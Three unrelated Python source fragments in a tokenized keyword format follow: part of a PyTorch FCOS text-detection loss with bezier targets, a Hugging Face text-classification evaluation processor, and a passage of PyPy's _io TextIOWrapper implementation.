locations_to_gt_inds]<line_sep>labels_per_im=labels_per_im[locations_to_gt_inds]<line_sep>labels_per_im[locations_to_min_aera<eq>INF]=0<line_sep>labels.append(labels_per_im)<line_sep>reg_targets.append(reg_targets_per_im)<line_sep>bezier_targets.append(bezier_targets_per_im)<block_end><return>labels reg_targets bezier_targets<block_end><def_stmt>compute_centerness_targets self reg_targets<block_start>left_right=reg_targets[: [0 2]]<line_sep>top_bottom=reg_targets[: [1 3]]<line_sep>centerness=(left_right.min(dim=-1)[0]/left_right.max(dim=-1)[0])<times>(top_bottom.min(dim=-1)[0]/top_bottom.max(dim=-1)[0])<line_sep><return>torch.sqrt(centerness)<block_end><def_stmt>__call__ self locations box_cls box_regression bezier_regression centerness targets<block_start>""" Arguments: locations (list[BoxList]) box_cls (list[Tensor]) box_regression (list[Tensor]) centerness (list[Tensor]) targets (list[BoxList]) Returns: cls_loss (Tensor) reg_loss (Tensor) centerness_loss (Tensor) """<line_sep>num_classes=box_cls[0].size(1)<line_sep>labels,reg_targets,bezier_targets=self.prepare_targets(locations targets)<line_sep>box_cls_flatten=[]<line_sep>box_regression_flatten=[]<line_sep>bezier_regression_flatten=[]<line_sep>centerness_flatten=[]<line_sep>labels_flatten=[]<line_sep>reg_targets_flatten=[]<line_sep>bezier_targets_flatten=[]<for_stmt>l range(len(labels))<block_start>box_cls_flatten.append(box_cls[l].permute(0 2 3 1).reshape(-1 num_classes))<line_sep>box_regression_flatten.append(box_regression[l].permute(0 2 3 1).reshape(-1 4))<line_sep>bezier_regression_flatten.append(bezier_regression[l].permute(0 2 3 1).reshape(-1 16))<line_sep>labels_flatten.append(labels[l].reshape(-1))<line_sep>reg_targets_flatten.append(reg_targets[l].reshape(-1 4))<line_sep>bezier_targets_flatten.append(bezier_targets[l].reshape(-1 16))<line_sep>centerness_flatten.append(centerness[l].reshape(-1))<block_end>box_cls_flatten=torch.cat(box_cls_flatten dim=0)<line_sep>box_regression_flatten=torch.cat(box_regression_flatten dim=0)<line_sep>bezier_regression_flatten=torch.cat(bezier_regression_flatten dim=0)<line_sep>centerness_flatten=torch.cat(centerness_flatten dim=0)<line_sep>labels_flatten=torch.cat(labels_flatten dim=0)<line_sep>reg_targets_flatten=torch.cat(reg_targets_flatten dim=0)<line_sep>bezier_targets_flatten=torch.cat(bezier_targets_flatten dim=0)<line_sep>pos_inds=torch.nonzero(labels_flatten<g>0).squeeze(1)<line_sep>num_pos_per_gpu=pos_inds.numel()<line_sep>num_gpus=get_world_size()<line_sep>total_num_pos=reduce_sum(pos_inds.new_tensor([num_pos_per_gpu])).item()<line_sep>box_regression_flatten=box_regression_flatten[pos_inds]<line_sep>bezier_regression_flatten=bezier_regression_flatten[pos_inds]<line_sep>reg_targets_flatten=reg_targets_flatten[pos_inds]<line_sep>bezier_targets_flatten=bezier_targets_flatten[pos_inds]<line_sep>centerness_flatten=centerness_flatten[pos_inds]<line_sep>cls_loss=self.cls_loss_func(box_cls_flatten labels_flatten.int())/max(total_num_pos/num_gpus 1.0)<line_sep># add N to avoid dividing by a zero <if_stmt>pos_inds.numel()<g>0<block_start>centerness_targets=self.compute_centerness_targets(reg_targets_flatten)<line_sep>sum_centerness_targets=centerness_targets.sum()<line_sep>sum_centerness_targets=reduce_sum(sum_centerness_targets).item()<line_sep>reg_loss=self.box_reg_loss_func(box_regression_flatten reg_targets_flatten centerness_targets)/(sum_centerness_targets/num_gpus)<line_sep>centerness_loss=self.centerness_loss_func(centerness_flatten centerness_targets)/max(total_num_pos/num_gpus 1.0)<block_end><else_stmt><block_start>reg_loss=box_regression_flatten.sum()<line_sep>bezier_loss=bezier_regression_flatten.sum()<line_sep>reduce_sum(centerness_flatten.new_tensor([0.0]))<line_sep>centerness_loss=centerness_flatten.sum()<block_end>bezier_loss=F.smooth_l1_loss(bezier_regression_flatten bezier_targets_flatten reduction="none")<line_sep>bezier_loss=((bezier_loss.mean(dim=-1)<times>centerness_targets).sum()/(sum_centerness_targets/num_gpus))<line_sep><return>cls_loss reg_loss bezier_loss centerness_loss<block_end><def_stmt>compute_offsets_targets self mask_targets reg_targets<block_start>num_chars=mask_targets.sum(dim=1).long()<line_sep>N,K=mask_targets.size()<line_sep>offsets_x=torch.zeros(N K dtype=torch.float32 device=mask_targets.device)<line_sep>offsets_y=torch.zeros(N K dtype=torch.float32 device=mask_targets.device)<for_stmt>i,(nc reg) enumerate(zip(num_chars reg_targets))<block_start>xs=(reg[2]+reg[0])<times>(torch.tensor(list(range(nc)) dtype=torch.float32 device=mask_targets.device)<times>2+1)/(nc<times>2)-reg[0]<line_sep>offsets_x[i :nc]=xs<line_sep>offsets_y[i :nc]=(reg[3]-reg[1])/2<block_end><return>torch.stack((offsets_y offsets_x) dim=2).view(N -1)<block_end><block_end><def_stmt>make_fcos_loss_evaluator cfg<block_start>loss_evaluator=FCOSLossComputation(cfg)<line_sep><return>loss_evaluator<block_end>
<import_from_stmt>functools partial<import_from_stmt>typing Dict List<import_from_stmt>datasets Dataset Metric load_dataset<import_from_stmt>transformers PretrainedConfig PreTrainedTokenizerBase TextClassificationPipeline<import_from_stmt>transformers.pipelines.text_classification ClassificationFunction<import_from_stmt>.base DatasetProcessing<class_stmt>TextClassificationProcessing(DatasetProcessing)<block_start><def_stmt>__init__ self **kwargs<block_start><if_stmt>"secondary"<not><in>kwargs["data_keys"]<block_start>kwargs["data_keys"]["secondary"]=<none><block_end>super().__init__(**kwargs)<line_sep>self.config=kwargs["config"]<line_sep>self.label_to_id=<none><block_end><def_stmt>load_datasets self# Downloading and loading a dataset from the hub. <block_start>raw_datasets=load_dataset(path=self.dataset_path name=self.dataset_name)<line_sep>max_eval_samples=100# TODO remove this # Labels <if_stmt><not>self.task_args["is_regression"]<block_start>label_list=raw_datasets[self.eval_split].features[self.ref_keys[0]].names<line_sep>num_labels=len(label_list)<block_end><else_stmt><block_start>num_labels=1<block_end><if_stmt>(self.config.label2id<ne>PretrainedConfig(num_labels=num_labels).label2id<and><not>self.task_args["is_regression"])# Some have all caps in their config, some don't. <block_start>label_name_to_id={k.lower():v<for>k,v self.config.label2id.items()}<if_stmt>list(sorted(label_name_to_id.keys()))<eq>list(sorted(label_list))<block_start>self.label_to_id={i:int(label_name_to_id[label_list[i]])<for>i range(num_labels)}<block_end><else_stmt><block_start>print("Your model seems to have been trained with labels, but they don't match the dataset: " f"model labels: {list(sorted(label_name_to_id.keys()))}, dataset labels:"<concat>f" {list(sorted(label_list))}.\nIgnoring the model labels as a result." )<block_end><block_end># Preprocessing the raw_datasets <def_stmt>preprocess_function examples data_keys:Dict[str str] tokenizer:PreTrainedTokenizerBase# Tokenize the texts <block_start>tokenized_inputs=tokenizer(text=examples[data_keys["primary"]] text_pair=examples[data_keys["secondary"]]<if>data_keys["secondary"]<else><none> padding="max_length" max_length=tokenizer.model_max_length truncation=<true> )<line_sep><return>tokenized_inputs<block_end>eval_dataset=raw_datasets[self.eval_split]<if_stmt>max_eval_samples<is><not><none><block_start>eval_dataset=eval_dataset.select(range(max_eval_samples))<block_end>datasets_dict={"eval":eval_dataset}<if_stmt>self.static_quantization<block_start><assert_stmt>self.calibration_split<line_sep># Run the tokenizer on the calibration dataset calibration_dataset=raw_datasets[self.calibration_split].map(partial(preprocess_function tokenizer=self.tokenizer data_keys=self.data_keys ) batched=<true> load_from_cache_file=<true> desc="Running tokenizer on calibration dataset" )<line_sep>columns_to_remove=raw_datasets.column_names[self.calibration_split]<line_sep>columns_to_remove=[name<for>name columns_to_remove<if>name<not><in>self.tokenizer.model_input_names]<line_sep>calibration_dataset=calibration_dataset.remove_columns(columns_to_remove)<if_stmt>self.num_calibration_samples<is><not><none><block_start>calibration_dataset=calibration_dataset.select(range(self.num_calibration_samples))<block_end>datasets_dict["calibration"]=calibration_dataset<block_end><return>datasets_dict<block_end><def_stmt>run_inference self eval_dataset:Dataset pipeline:TextClassificationPipeline<block_start>all_labels=[]<line_sep>all_preds=[]<for_stmt>_,inputs enumerate(eval_dataset)<block_start>has_labels=all(inputs.get(k)<is><not><none><for>k self.ref_keys)<if_stmt>has_labels<block_start>labels=tuple(inputs.get(name)<for>name self.ref_keys)<if_stmt>len(labels)<eq>1<block_start>labels=labels[0]<block_end><else_stmt><block_start><raise>ValueError("Only one label supported.")<block_end><block_end><else_stmt><block_start><raise>ValueError("Missing labels")<block_end>all_labels.append(labels)<line_sep># we manually unroll the pipeline since it is broken # see https://github.com/huggingface/transformers/issues/17305 <if_stmt>self.data_keys["secondary"]<block_start>inps=[inputs[self.data_keys["primary"]] inputs[self.data_keys["secondary"]]]<block_end><else_stmt><block_start>inps=inputs[self.data_keys["primary"]]<block_end>tokenized_inputs=pipeline.preprocess([inps])<line_sep>model_outputs=pipeline.forward(tokenized_inputs)<line_sep># preds is a dict. No processing function is applied as not needed for score in the regression case preds=pipeline.postprocess(model_outputs function_to_apply=ClassificationFunction.NONE)<if_stmt><not>self.task_args["is_regression"]# the dataset label ids may be different from the label2id of predictions <block_start><if_stmt>self.label_to_id<is><not><none><block_start>preds=self.config.label2id[preds["label"]]<line_sep>preds=self.label_to_id[preds]<block_end><else_stmt><block_start>preds=self.config.label2id[preds["label"]]<block_end><block_end><else_stmt><block_start>preds=preds["score"]<block_end>all_preds.append(preds)<block_end><return>all_labels all_preds<block_end><def_stmt>get_metrics self predictions:List references:List metric:Metric<block_start><return>metric.compute(predictions=predictions references=references)<block_end><def_stmt>get_pipeline_kwargs self<block_start><return>{}<block_end><block_end>
<import_stmt>sys<import_from_stmt>pypy.interpreter.baseobjspace W_Root<import_from_stmt>pypy.interpreter.error OperationError oefmt<import_from_stmt>pypy.interpreter.gateway WrappedDefault interp2app unwrap_spec<import_from_stmt>pypy.interpreter.typedef GetSetProperty TypeDef generic_new_descr interp_attrproperty interp_attrproperty_w <import_from_stmt>pypy.module._codecs interp_codecs<import_from_stmt>pypy.module._io.interp_iobase W_IOBase convert_size trap_eintr<import_from_stmt>rpython.rlib.rarithmetic intmask r_uint r_ulonglong<import_from_stmt>rpython.rlib.rbigint rbigint<import_from_stmt>rpython.rlib.rstring UnicodeBuilder<line_sep>STATE_ZERO,STATE_OK,STATE_DETACHED=range(3)<line_sep>SEEN_CR=1<line_sep>SEEN_LF=2<line_sep>SEEN_CRLF=4<line_sep>SEEN_ALL=SEEN_CR|SEEN_LF|SEEN_CRLF<line_sep>_WINDOWS=sys.platform<eq>'win32'<class_stmt>W_IncrementalNewlineDecoder(W_Root)<block_start>seennl=0<line_sep>pendingcr=<false><line_sep>w_decoder=<none><def_stmt>__init__ self space<block_start>self.w_newlines_dict={SEEN_CR:space.newunicode(u"\r") SEEN_LF:space.newunicode(u"\n") SEEN_CRLF:space.newunicode(u"\r\n") SEEN_CR|SEEN_LF:space.newtuple([space.newunicode(u"\r") space.newunicode(u"\n")]) SEEN_CR|SEEN_CRLF:space.newtuple([space.newunicode(u"\r") space.newunicode(u"\r\n")]) SEEN_LF|SEEN_CRLF:space.newtuple([space.newunicode(u"\n") space.newunicode(u"\r\n")]) SEEN_CR|SEEN_LF|SEEN_CRLF:space.newtuple([space.newunicode(u"\r") space.newunicode(u"\n") space.newunicode(u"\r\n")]) }<block_end>@unwrap_spec(translate=int)<def_stmt>descr_init self space w_decoder translate w_errors=<none><block_start>self.w_decoder=w_decoder<line_sep>self.translate=translate<if_stmt>space.is_none(w_errors)<block_start>self.w_errors=space.newtext("strict")<block_end><else_stmt><block_start>self.w_errors=w_errors<block_end>self.seennl=0<block_end><def_stmt>newlines_get_w self space<block_start><return>self.w_newlines_dict.get(self.seennl space.w_None)<block_end>@unwrap_spec(final=int)<def_stmt>decode_w self space w_input final=<false><block_start><if_stmt>self.w_decoder<is><none><block_start><raise>oefmt(space.w_ValueError "IncrementalNewlineDecoder.__init__ not called")<block_end># decode input (with the eventual \r from a previous pass) <if_stmt><not>space.is_w(self.w_decoder space.w_None)<block_start>w_output=space.call_method(self.w_decoder "decode" w_input space.newbool(bool(final)))<block_end><else_stmt><block_start>w_output=w_input<block_end><if_stmt><not>space.isinstance_w(w_output space.w_unicode)<block_start><raise>oefmt(space.w_TypeError "decoder should return a string result")<block_end>output=space.unicode_w(w_output)<line_sep>output_len=len(output)<if_stmt>self.pendingcr<and>(final<or>output_len)<block_start>output=u'\r'+output<line_sep>self.pendingcr=<false><line_sep>output_len<augadd>1<block_end># retain last \r even when not translating data: # then readline() is sure to get \r\n in one pass <if_stmt><not>final<and>output_len<g>0<block_start>last=output_len-1<assert_stmt>last<ge>0<if_stmt>output[last]<eq>u'\r'<block_start>output=output[:last]<line_sep>self.pendingcr=<true><line_sep>output_len<augsub>1<block_end><block_end><if_stmt>output_len<eq>0<block_start><return>space.newunicode(u"")<block_end># Record which newlines are read and do newline translation if # desired, all in one pass. seennl=self.seennl<line_sep># If, up to now, newlines are consistently \n, do a quick check # for the \r only_lf=<false><if_stmt>seennl<eq>SEEN_LF<or>seennl<eq>0<block_start>only_lf=(output.find(u'\r')<l>0)<block_end><if_stmt>only_lf# If not already seen, quick scan for a possible "\n" character. # (there's nothing else to be done, even when in translation mode) <block_start><if_stmt>seennl<eq>0<and>output.find(u'\n')<ge>0<block_start>seennl<augor>SEEN_LF<line_sep># Finished: we have scanned for newlines, and none of them # need translating. <block_end><block_end><elif_stmt><not>self.translate<block_start>i=0<while_stmt>i<l>output_len<block_start><if_stmt>seennl<eq>SEEN_ALL<block_start><break><block_end>c=output[i]<line_sep>i<augadd>1<if_stmt>c<eq>u'\n'<block_start>seennl<augor>SEEN_LF<block_end><elif_stmt>c<eq>u'\r'<block_start><if_stmt>i<l>output_len<and>output[i]<eq>u'\n'<block_start>seennl<augor>SEEN_CRLF<line_sep>i<augadd>1<block_end><else_stmt><block_start>seennl<augor>SEEN_CR<block_end><block_end><block_end><block_end><elif_stmt>output.find(u'\r')<ge>0# Translate! <block_start>builder=UnicodeBuilder(output_len)<line_sep>i=0<while_stmt>i<l>output_len<block_start>c=output[i]<line_sep>i<augadd>1<if_stmt>c<eq>u'\n'<block_start>seennl<augor>SEEN_LF<block_end><elif_stmt>c<eq>u'\r'<block_start><if_stmt>i<l>output_len<and>output[i]<eq>u'\n'<block_start>seennl<augor>SEEN_CRLF<line_sep>i<augadd>1<block_end><else_stmt><block_start>seennl<augor>SEEN_CR<block_end>builder.append(u'\n')<line_sep><continue><block_end>builder.append(c)<block_end>output=builder.build()<block_end>self.seennl<augor>seennl<line_sep><return>space.newunicode(output)<block_end><def_stmt>reset_w self space<block_start>self.seennl=0<line_sep>self.pendingcr=<false><if_stmt>self.w_decoder<and><not>space.is_w(self.w_decoder space.w_None)<block_start>space.call_method(self.w_decoder "reset")<block_end><block_end><def_stmt>getstate_w self space<block_start><if_stmt>self.w_decoder<and><not>space.is_w(self.w_decoder space.w_None)<block_start>w_state=space.call_method(self.w_decoder "getstate")<line_sep>w_buffer,w_flag=space.unpackiterable(w_state 2)<line_sep>flag=space.r_longlong_w(w_flag)<block_end><else_stmt><block_start>w_buffer=space.newbytes("")<line_sep>flag=0<block_end>flag<auglshift>1<if_stmt>self.pendingcr<block_start>flag<augor>1<block_end><return>space.newtuple([w_buffer space.newint(flag)])<block_end><def_stmt>setstate_w self space w_state<block_start>w_buffer,w_flag=space.unpackiterable(w_state 2)<line_sep>flag=space.r_longlong_w(w_flag)<line_sep>self.pendingcr=bool(flag&1)<line_sep>flag<augrshift>1<if_stmt>self.w_decoder<and><not>space.is_w(self.w_decoder space.w_None)<block_start>w_state=space.newtuple([w_buffer space.newint(flag)])<line_sep>space.call_method(self.w_decoder "setstate" w_state)<block_end><block_end><block_end>W_IncrementalNewlineDecoder.typedef=TypeDef('_io.IncrementalNewlineDecoder' __new__=generic_new_descr(W_IncrementalNewlineDecoder) __init__=interp2app(W_IncrementalNewlineDecoder.descr_init) decode=interp2app(W_IncrementalNewlineDecoder.decode_w) reset=interp2app(W_IncrementalNewlineDecoder.reset_w) getstate=interp2app(W_IncrementalNewlineDecoder.getstate_w) setstate=interp2app(W_IncrementalNewlineDecoder.setstate_w) newlines=GetSetProperty(W_IncrementalNewlineDecoder.newlines_get_w) )<class_stmt>W_TextIOBase(W_IOBase)<block_start>w_encoding=<none><def_stmt>__init__ self space<block_start>W_IOBase.__init__(self space)<block_end><def_stmt>read_w self space w_size=<none><block_start>self._unsupportedoperation(space "read")<block_end><def_stmt>readline_w self space w_limit=<none><block_start>self._unsupportedoperation(space "readline")<block_end><def_stmt>write_w self space w_data<block_start>self._unsupportedoperation(space "write")<block_end><def_stmt>detach_w self space<block_start>self._unsupportedoperation(space "detach")<block_end><def_stmt>errors_get_w self space<block_start><return>space.w_None<block_end><def_stmt>newlines_get_w self space<block_start><return>space.w_None<block_end><block_end>W_TextIOBase.typedef=TypeDef('_io._TextIOBase' W_IOBase.typedef __new__=generic_new_descr(W_TextIOBase) read=interp2app(W_TextIOBase.read_w) readline=interp2app(W_TextIOBase.readline_w) write=interp2app(W_TextIOBase.write_w) detach=interp2app(W_TextIOBase.detach_w) encoding=interp_attrproperty_w("w_encoding" W_TextIOBase) newlines=GetSetProperty(W_TextIOBase.newlines_get_w) errors=GetSetProperty(W_TextIOBase.errors_get_w) )<def_stmt>_determine_encoding space encoding<block_start><if_stmt>encoding<is><not><none><block_start><return>space.newtext(encoding)<block_end><try_stmt><block_start>w_locale=space.call_method(space.builtin '__import__' space.newtext('locale'))<line_sep>w_encoding=space.call_method(w_locale 'getpreferredencoding')<block_end><except_stmt>OperationError<as>e# getpreferredencoding() may also raise ImportError <block_start><if_stmt><not>e.match(space space.w_ImportError)<block_start><raise><block_end><return>space.newtext('ascii')<block_end><else_stmt><block_start><if_stmt>space.isinstance_w(w_encoding space.w_text)<block_start><return>w_encoding<block_end><block_end><raise>oefmt(space.w_IOError "could not determine default encoding")<block_end><class_stmt>PositionCookie(object)<block_start><def_stmt>__init__ self bigint<block_start>self.start_pos=bigint.ulonglongmask()<line_sep>bigint=bigint.rshift(r_ulonglong.BITS)<line_sep>x=intmask(bigint.uintmask())<assert_stmt>x<ge>0<line_sep>self.dec_flags=x<line_sep>bigint=bigint.rshift(r_uint.BITS)<line_sep>x=intmask(bigint.uintmask())<assert_stmt>x<ge>0<line_sep>self.bytes_to_feed=x<line_sep>bigint=bigint.rshift(r_uint.BITS)<line_sep>x=intmask(bigint.uintmask())<assert_stmt>x<ge>0<line_sep>self.chars_to_skip=x<line_sep>bigint=bigint.rshift(r_uint.BITS)<line_sep>self.need_eof=bigint.tobool()<block_end><def_stmt>pack self# The meaning of a tell() cookie is: seek to position, set the # decoder flags to dec_flags, read bytes_to_feed bytes, feed them # into the decoder with need_eof as the EOF flag, then skip # chars_to_skip characters of the decoded result. For most simple # decoders, tell() will often just give a byte offset in the file. <block_start>rb=rbigint.fromrarith_int<line_sep>res=rb(self.start_pos)<line_sep>bits=r_ulonglong.BITS<line_sep>res=res.or_(rb(r_uint(self.dec_flags)).lshift(bits))<line_sep>bits<augadd>r_uint.BITS<line_sep>res=res.or_(rb(r_uint(self.bytes_to_feed)).lshift(bits))<line_sep>bits<augadd>r_uint.BITS<line_sep>res=res.or_(rb(r_uint(self.chars_to_skip)).lshift(bits))<line_sep>bits<augadd>r_uint.BITS<line_sep><return>res.or_(rb(r_uint(self.need_eof)).lshift(bits))<block_end><block_end><class_stmt>PositionSnapshot<block_start><def_stmt>__init__ self flags input<block_start>self.flags=flags<line_sep>self.input=input<block_end><block_end><class_stmt>DecodeBuffer(object)<block_start><def_stmt>__init__ self text=<none><block_start>self.text=text<line_sep>self.pos=0<block_end><def_stmt>set self space w_decoded<block_start>check_decoded(space w_decoded)<line_sep>self.text=space.unicode_w(w_decoded)<line_sep>self.pos=0<block_end><def_stmt>reset self<block_start>self.text=<none><line_sep>self.pos=0<block_end><def_stmt>get_chars self size<block_start><if_stmt>self.text<is><none><block_start><return>u""<block_end>available=len(self.text)-self.pos<if_stmt>size<l>0<or>size<g>available<block_start>size=available<block_end><assert_stmt>size<ge>0<if_stmt>self.pos<g>0<or>size<l>available<block_start>start=self.pos<line_sep>end=self.pos+size<assert_stmt>start<ge>0<assert_stmt>end<ge>0<line_sep>chars=self.text[start:end]<block_end><else_stmt><block_start>chars=self.text<block_end>self.pos<augadd>size<line_sep><return>chars<block_end><def_stmt>has_data self<block_start><return>(self.text<is><not><none><and><not>self.exhausted())<block_end><def_stmt>exhausted self<block_start><return>self.pos<ge>len(self.text)<block_end><def_stmt>next_char self<block_start><if_stmt>self.exhausted()<block_start><raise>StopIteration<block_end>ch=self.text[self.pos]<line_sep>self.pos<augadd>1<line_sep><return>ch<block_end><def_stmt>peek_char self# like next_char, but doesn't advance pos <block_start><if_stmt>self.exhausted()<block_start><raise>StopIteration<block_end>ch=self.text[self.pos]<line_sep><return>ch<block_end><def_stmt>find_newline_universal self limit# Universal newline search. Find any of \r, \r\n, \n # The decoder ensures that \r\n are not split in two pieces <block_start><if_stmt>limit<l>0<block_start>limit=sys.maxint<block_end>scanned=0<while_stmt>scanned<l>limit<block_start><try_stmt><block_start>ch=self.next_char()<line_sep>scanned<augadd>1<block_end><except_stmt>StopIteration<block_start><return><false><block_end><if_stmt>ch<eq>u'\n'<block_start><return><true><block_end><if_stmt>ch<eq>u'\r'<block_start><if_stmt>scanned<ge>limit<block_start><return><false><block_end><try_stmt><block_start>ch=self.peek_char()<block_end><except_stmt>StopIteration<block_start><return><false><block_end><if_stmt>ch<eq>u'\n'<block_start>self.next_char()<line_sep><return><true><block_end><else_stmt><block_start><return><true><block_end><block_end><block_end><return><false><block_end><def_stmt>find_crlf self limit<block_start><if_stmt>limit<l>0<block_start>limit=sys.maxint<block_end>scanned=0<while_stmt>scanned<l>limit<block_start><try_stmt><block_start>ch=self.next_char()<block_end><except_stmt>StopIteration<block_start><return><false><block_end>scanned<augadd>1<if_stmt>ch<eq>u'\r'<block_start><if_stmt>scanned<ge>limit<block_start><return><false><block_end><try_stmt><block_start><if_stmt>self.peek_char()<eq>u'\n'<block_start>self.next_char()<line_sep><return><true><block_end><block_end><except_stmt>StopIteration# This is the tricky case: we found a \r right at the end <block_start>self.pos<augsub>1<line_sep><return><false><block_end><block_end><block_end><return><false><block_end><def_stmt>find_char self marker limit<block_start><if_stmt>limit<l>0<block_start>limit=sys.maxint<block_end>scanned=0<while_stmt>scanned<l>limit<block_start><try_stmt><block_start>ch=self.next_char()<block_end><except_stmt>StopIteration<block_start><return><false><block_end><if_stmt>ch<eq>marker<block_start><return><true><block_end>scanned<augadd>1<block_end><return><false><block_end><block_end><def_stmt>check_decoded space w_decoded<block_start><if_stmt><not>space.isinstance_w(w_decoded space.w_unicode)<block_start>msg="decoder should return a string result, not '%T'"<line_sep><raise>oefmt(space.w_TypeError msg w_decoded)<block_end><return>w_decoded<block_end><class_stmt>W_TextIOWrapper(W_TextIOBase)<block_start><def_stmt>__init__ self space<block_start>W_TextIOBase.__init__(self space)<line_sep>self.state=STATE_ZERO<line_sep>self.w_encoder=<none><line_sep>self.w_decoder=<none><line_sep>self.decoded=DecodeBuffer()<line_sep>self.pending_bytes=<none># list of bytes objects waiting to be # written, or NULL self.chunk_size=8192<line_sep>self.readuniversal=<false><line_sep>self.readtranslate=<false><line_sep>self.readnl=<none><line_sep>self.encodefunc=<none># Specialized encoding func (see below) self.encoding_start_of_stream=<false># Whether or not it's the start # of the stream self.snapshot=<none><block_end>@unwrap_spec(encoding="text_or_none" line_buffering=int)<def_stmt>descr_init self space w_buffer encoding=<none> w_errors=<none> w_newline=<none> line_buffering=0<block_start>self.state=STATE_ZERO<line_sep>self.w_buffer=w_buffer<line_sep>self.w_encoding=_determine_encoding(space encoding)<if_stmt>space.is_none(w_errors)<block_start>w_errors=space.newtext("strict")<block_end>self.w_errors=w_errors<if_stmt>space.is_none(w_newline)<block_start>newline=<none><block_end><else_stmt><block_start>newline=space.unicode_w(w_newline)<block_end><if_stmt>newline<and>newline<not><in>(u'\n' u'\r\n' u'\r')<block_start><raise>oefmt(space.w_ValueError "illegal newline value: %R" w_newline)<block_end>self.line_buffering=line_buffering<line_sep>self.readuniversal=<not>newline# null or empty self.readtranslate=newline<is><none><line_sep>self.readnl=newline<line_sep>self.writetranslate=(newline<ne>u'')<if_stmt><not>self.readuniversal<block_start>self.writenl=self.readnl<if_stmt>self.writenl<eq>u'\n'<block_start>self.writenl=<none><block_end><block_end><elif_stmt>_WINDOWS<block_start>self.writenl=u"\r\n"<block_end><else_stmt><block_start>self.writenl=<none><block_end># build the decoder object <if_stmt>space.is_true(space.call_method(w_buffer "readable"))<block_start>w_codec=interp_codecs.lookup_codec(space space.text_w(self.w_encoding))<line_sep>self.w_decoder=space.call_method(w_codec "incrementaldecoder" w_errors)<if_stmt>self.readuniversal<block_start>self.w_decoder=space.call_function(space.gettypeobject(W_IncrementalNewlineDecoder.typedef) self.w_decoder space.newbool(self.readtranslate))<block_end><block_end># build the encoder object <if_stmt>space.is_true(space.call_method(w_buffer "writable"))<block_start>w_codec=interp_codecs.lookup_codec(space space.text_w(self.w_encoding))<line_sep>self.w_encoder=space.call_method(w_codec "incrementalencoder" w_errors)<block_end>self.seekable=space.is_true(space.call_method(w_buffer "seekable"))<line_sep>self.telling=self.seekable<line_sep>self.encoding_start_of_stream=<false><if_stmt>self.seekable<and>self.w_encoder<block_start>self.encoding_start_of_stream=<true><line_sep>w_cookie=space.call_method(self.w_buffer "tell")<if_stmt><not>space.eq_w(w_cookie space.newint(0))<block_start>self.encoding_start_of_stream=<false><line_sep>space.call_method(self.w_encoder "setstate" space.newint(0))<block_end><block_end>self.state=STATE_OK<block_end><def_stmt>_check_init self space<block_start><if_stmt>self.state<eq>STATE_ZERO<block_start><raise>oefmt(space.w_ValueError "I/O operation on uninitialized object")<block_end><block_end><def_stmt>_check_attached self space<block_start><if_stmt>self.state<eq>STATE_DETACHED<block_start><raise>oefmt(space.w_ValueError "underlying buffer has been detached")<block_end>self._check_init(space)<block_end><def_stmt>_check_closed self space message=<none><block_start>self._check_init(space)<line_sep>W_TextIOBase._check_closed(self space message)<block_end><def_stmt>descr_repr self space<block_start>self._check_init(space)<line_sep>w_name=space.findattr(self space.newtext("name"))<if_stmt>w_name<is><none><block_start>w_name_str=space.newtext("")<block_end><else_stmt><block_start>w_name_str=space.mod(space.newtext("name=%r ") w_name)<block_end>w_args=space.newtuple([w_name_str self.w_encoding])<line_sep><return>space.mod(space.newtext("<_io.TextIOWrapper %sencoding=%r>") w_args)<block_end><def_stmt>readable_w self space<block_start>self._check_attached(space)<line_sep><return>space.call_method(self.w_buffer "readable")<block_end><def_stmt>writable_w self space<block_start>self._check_attached(space)<line_sep><return>space.call_method(self.w_buffer "writable")<block_end><def_stmt>seekable_w self space<block_start>self._check_attached(space)<line_sep><return>space.call_method(self.w_buffer "seekable")<block_end><def_stmt>isatty_w self space<block_start>self._check_attached(space)<line_sep><return>space.call_method(self.w_buffer "isatty")<block_end><def_stmt>fileno_w self space<block_start>self._check_attached(space)<line_sep><return>space.call_method(self.w_buffer "fileno")<block_end><def_stmt>closed_get_w self space<block_start>self._check_attached(space)<line_sep><return>space.getattr(self.w_buffer space.newtext("closed"))<block_end><def_stmt>newlines_get_w self space<block_start>self._check_attached(space)<if_stmt>self.w_decoder<is><none><block_start><return>space.w_None<block_end><return>space.findattr(self.w_decoder space.newtext("newlines"))<block_end><def_stmt>name_get_w self space<block_start>self._check_attached(space)<line_sep><return>space.getattr(self.w_buffer space.newtext("name"))<block_end><def_stmt>flush_w self space<block_start>self._check_attached(space)<line_sep>self._check_closed(space)<line_sep>self.telling=self.seekable<line_sep>self._writeflush(space)<line_sep>space.call_method(self.w_buffer "flush")<block_end>@unwrap_spec(w_pos=WrappedDefault(<none>))<def_stmt>truncate_w self space w_pos=<none><block_start>self._check_attached(space)<line_sep>space.call_method(self "flush")<line_sep><return>space.call_method(self.w_buffer "truncate" w_pos)<block_end><def_stmt>close_w self space<block_start>self._check_attached(space)<if_stmt><not>space.is_true(space.getattr(self.w_buffer space.newtext("closed")))<block_start><try_stmt><block_start>space.call_method(self "flush")<block_end><finally_stmt><block_start>ret=space.call_method(self.w_buffer "close")<block_end><return>ret<block_end><block_end># _____________________________________________________________ # read methods <def_stmt>_read_chunk self space<block_start>"""Read and decode the next chunk of data from the BufferedReader. The return value is True unless EOF was reached. The decoded string is placed in self.decoded (replacing its previous value). The entire input chunk is sent to the decoder, though some of it may remain buffered in the decoder, yet to be converted."""<if_stmt><not>self.w_decoder<block_start><raise>oefmt(space.w_IOError "not readable")<block_end><if_stmt>self.telling# To prepare for tell(), we need to snapshot a point in the file # where the decoder's input buffer is empty. <block_start>w_state=space.call_method(self.w_decoder "getstate")<line_sep># Given this, we know there was a valid snapshot point # len(dec_buffer) bytes ago with decoder state (b'', dec_flags). w_dec_buffer,w_dec_flags=space.unpackiterable(w_state 2)<line_sep>dec_buffer=space.bytes_w(w_dec_buffer)<line_sep>dec_flags=space.int_w(w_dec_flags)<block_end><else_stmt><block_start>dec_buffer=<none><line_sep>dec_flags=0<block_end># Read a chunk, decode it, and put the result in self.decoded w_input=space.call_method(self.w_buffer "read1" space.newint(self.chunk_size))<if_stmt><not>space.isinstance_w(w_input space.w_bytes)<block_start>msg="decoder getstate() should have returned a bytes "<concat>"object not '%T'"<line_sep><raise>oefmt(space.w_TypeError msg w_input)<block_end>eof=space.len_w(w_input)<eq>0<line_sep>w_decoded=space.call_method(self.w_decoder "decode" w_input space.newbool(eof))<line_sep>self.decoded.set(space w_decoded)<if_stmt>space.len_w(w_decoded)<g>0<block_start>eof=<false><block_end><if_stmt>self.telling# At the snapshot point, len(dec_buffer) bytes before the read, # the next input to be decoded is dec_buffer + input_chunk. 